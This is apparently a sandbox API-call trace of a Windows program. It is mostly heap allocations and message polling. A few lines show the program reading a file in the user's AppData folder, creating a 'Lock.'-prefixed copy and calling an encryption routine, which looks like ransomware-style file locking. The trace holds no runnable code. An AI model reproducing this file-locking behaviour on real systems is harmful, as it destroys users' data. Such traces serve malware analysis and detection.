0x2e54ef8 [0227.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0227.405] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0227.405] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0227.405] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0227.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0227.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0227.406] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Dm2KF.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dm2kf.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0227.406] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.406] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0227.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0227.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0227.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.407] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0227.407] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0227.407] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0227.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0227.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.407] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0227.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0227.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0227.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0227.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0227.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Dm2KF.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.dm2kf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0227.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0227.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0227.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0227.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.410] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0227.410] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0227.410] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0227.410] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0227.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe56020 [0227.411] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0227.411] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x5116, lpOverlapped=0x0) returned 1 [0227.413] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0227.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0227.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x3bf0dd8 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe56020 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0227.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0227.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x2f14818 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x3bf0dd8 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0227.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0227.416] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0227.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0227.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x3bf0dd8 [0227.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0227.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f78 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0227.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0227.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x2f19938 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0227.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0227.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.418] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.419] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, 